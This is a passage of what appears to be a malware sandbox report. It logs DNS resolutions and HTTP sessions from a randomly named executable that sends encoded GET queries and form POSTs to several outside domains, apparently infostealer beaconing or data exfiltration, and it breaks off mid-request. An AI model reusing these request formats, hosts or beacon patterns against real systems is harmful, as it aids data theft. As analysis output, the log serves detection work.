                                          Jul 4, 2024 16:53:22.011007071 CEST1.1.1.1192.168.2.70x1731No error (0)www.bfiworkerscomp.com208.91.197.27A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:35.700967073 CEST1.1.1.1192.168.2.70xa43bName error (3)www.tinmapco.comnonenoneA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:44.351984978 CEST1.1.1.1192.168.2.70x795cNo error (0)www.xn--fhq1c541j0zr.com43.252.167.188A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:58.134581089 CEST1.1.1.1192.168.2.70xad1dNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:58.134581089 CEST1.1.1.1192.168.2.70xad1dNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:54:12.048006058 CEST1.1.1.1192.168.2.70x1736No error (0)www.anuts.top23.251.54.212A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:54:46.300498962 CEST1.1.1.1192.168.2.70x6294No error (0)www.telwisey.info199.192.19.19A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:54:59.769205093 CEST1.1.1.1192.168.2.70x4fc2No error (0)www.sandranoll.com213.145.228.16A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:55:13.222177029 CEST1.1.1.1192.168.2.70x185cNo error (0)www.gipsytroya.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:55:13.222177029 CEST1.1.1.1192.168.2.70x185cNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:55:26.608942986 CEST1.1.1.1192.168.2.70x5c85No error (0)www.helpers-lion.online194.58.112.174A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:55:40.008565903 CEST1.1.1.1192.168.2.70xa5dcNo error (0)www.dmtxwuatbz.cc172.67.210.102A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:55:40.008565903 CEST1.1.1.1192.168.2.70xa5dcNo error (0)www.dmtxwuatbz.cc104.21.45.56A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.hprlz.cz
                                          • www.catherineviskadi.com
                                          • www.bfiworkerscomp.com
                                          • www.xn--fhq1c541j0zr.com
                                          • www.xn--matfrmn-jxa4m.se
                                          • www.anuts.top
                                          • www.telwisey.info
                                          • www.sandranoll.com
                                          • www.gipsytroya.com
                                          • www.helpers-lion.online
                                          • www.dmtxwuatbz.cc

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.7497045.44.111.162806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:52:36.477865934 CEST522OUTGET /w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.hprlz.cz
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:52:37.133348942 CEST777INHTTP/1.1 301 Moved Permanently
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:52:37 GMT
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 403
                                          Connection: close
                                          Location: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 66 68 57 3d 42 4c 76 58 72 36 65 30 45 68 79 78 65 58 26 61 6d 70 3b 59 62 43 4c 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 7a 46 72 4b 44 6c 45 6b 78 66 30 68 53 47 62 71 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 7a 68 64 55 53 49 56 4c 43 74 6b 41 6a 76 45 4c 70 36 33 31 44 4a [TRUNCATED]
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz">here</a>.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.749705217.160.0.106806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:52:52.254179955 CEST808OUTPOST /qe66/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.catherineviskadi.com
                                          Origin: http://www.catherineviskadi.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.catherineviskadi.com/qe66/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 45 73 57 43 76 50 76 4a 67 55 49 48 76 62 4c 52 74 58 31 56 44 4c 50 47 4f 31 32 42 45 43 6e 47 71 66 2b 76 53 65 4c 6d 4f 65 4b 48 37 78 52 78 77 3d 3d
                                          Data Ascii: YbCL=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7EsWCvPvJgUIHvbLRtX1VDLPGO12BECnGqf+vSeLmOeKH7xRxw==
                                          Jul 4, 2024 16:52:52.932354927 CEST580INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:52:52 GMT
                                          Server: Apache
                                          Content-Encoding: gzip
                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.749706217.160.0.106806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:52:54.789097071 CEST828OUTPOST /qe66/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.catherineviskadi.com
                                          Origin: http://www.catherineviskadi.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.catherineviskadi.com/qe66/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 7a 30 43 4d 52 41 57 69 66 53 45 72 62 6d 69 77 71 71 35 35 37 67 4b 70 51 56 6e 42 4c 6b 78 39 63 76 69 76 32 70 38 4d 63 78 49 53 49 6d 58 65 45 3d
                                          Data Ascii: YbCL=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLSz0CMRAWifSErbmiwqq557gKpQVnBLkx9cviv2p8McxISImXeE=
                                          Jul 4, 2024 16:52:55.473630905 CEST580INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:52:55 GMT
                                          Server: Apache
                                          Content-Encoding: gzip
                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.749707217.160.0.106806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:52:57.320303917 CEST1841OUTPOST /qe66/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.catherineviskadi.com
                                          Origin: http://www.catherineviskadi.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.catherineviskadi.com/qe66/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 55 7a 50 74 76 41 59 66 6e 65 53 52 6d 31 50 50 63 6a 59 43 58 6d 42 4b 54 34 6f 6a 7a 4e 31 4f 72 43 54 4b 63 4e 69 77 32 38 75 4d 63 4e 36 2f 53 38 2f 70 35 34 55 44 59 78 4a 4a 50 6b 4e 75 4e 4a 2b 30 43 43 4b 53 2f 32 63 45 76 57 57 4f 51 2b 32 42 7a 31 48 44 43 50 52 45 76 71 2f 37 2f 78 65 73 67 6d 62 75 31 35 30 6f 5a 35 45 4e 63 41 52 70 4b 65 7a 72 43 55 63 79 52 4e 6c 34 73 59 41 70 6d 4e 69 4a 61 73 57 4e 36 73 36 30 69 4e 36 75 30 31 64 72 36 72 54 55 6d 44 41 58 35 73 78 [TRUNCATED]
                                          Data Ascii: YbCL=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARUzPtvAYfneSRm1PPcjYCXmBKT4ojzN1OrCTKcNiw28uMcN6/S8/p54UDYxJJPkNuNJ+0CCKS/2cEvWWOQ+2Bz1HDCPREvq/7/xesgmbu150oZ5ENcARpKezrCUcyRNl4sYApmNiJasWN6s60iN6u01dr6rTUmDAX5sxPp3UuTC6FcQXzF/5wsvGZostbh71MAweh6LQmJIrN32y/CO5D3fSwX6mKu7KoomL8pbXhgFkS/UtQid2R6b47fxJgVXMoGBAljJ7hTQh8syeNZmgLi9EsjDuzWYZi4dOGmfcEgRAcjMHDmHxGSteyh0fIh1Er1ukgRL8R4cJAq4ELeF2CKNJLF1J5TzT3afJlY8ThacArg8NLk/V44M721shevVitOuPZdNKn5mTnJcMaKVvXj9lf2QQHtO67k17IameJXb9djJMz1y7h6J6M1/d7kLEAF8/IJlmDwz6qXbKnY5/Wo+lxHl7u/JxmRsmFkcpSmgR9HjMPomm4n/LLp+DssBAXyNBGD+VKfUxyj+SqWtKE2qg8Hg7+7HPFD4u91ddkAhj3ANFqos8YZ/rM0XyiYiu0wcU9AYIAr0551t8hqsgT/p0DELYorbsb31+jG2Wu3bc3mvQdf5G5yKGlGJ3XcdG3hvfy16H2x4rnfQXx7xBC6kv86K3WSsX/dorcc1ozfA7FomyaEwNKhM8Xjz/OG5Z0XPzifKqeGaUGObXy0OA5ylTLL6A2KRUcXe7gwIjZosj0FzAC+nxa1+LOuSZ49Eryy9gDLaCnNUQ6RU6ipLwwOfxGYMhZvDdlnxNmchMu2wfGd9U4fjP4QtRXPd6NccW/Sw7fx [TRUNCATED]
                                          Jul 4, 2024 16:52:58.071453094 CEST580INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:52:57 GMT
                                          Server: Apache
                                          Content-Encoding: gzip
                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.749708217.160.0.106806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:52:59.856486082 CEST534OUTGET /qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.catherineviskadi.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:53:00.517497063 CEST770INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 626
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:53:00 GMT
                                          Server: Apache
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.749712208.91.197.27806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:22.021315098 CEST802OUTPOST /xzzi/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.bfiworkerscomp.com
                                          Origin: http://www.bfiworkerscomp.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.bfiworkerscomp.com/xzzi/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 62 32 44 44 51 53 6a 54 30 53 74 59 39 57 6b 48 76 43 58 69 49 6d 49 68 31 42 75 32 65 51 57 37 66 35 5a 4f 74 47 78 32 74 72 78 4d 4f 76 4b 50 67 3d 3d
                                          Data Ascii: YbCL=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDb2DDQSjT0StY9WkHvCXiImIh1Bu2eQW7f5ZOtGx2trxMOvKPg==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.749713208.91.197.27806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:24.553352118 CEST822OUTPOST /xzzi/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.bfiworkerscomp.com
                                          Origin: http://www.bfiworkerscomp.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.bfiworkerscomp.com/xzzi/
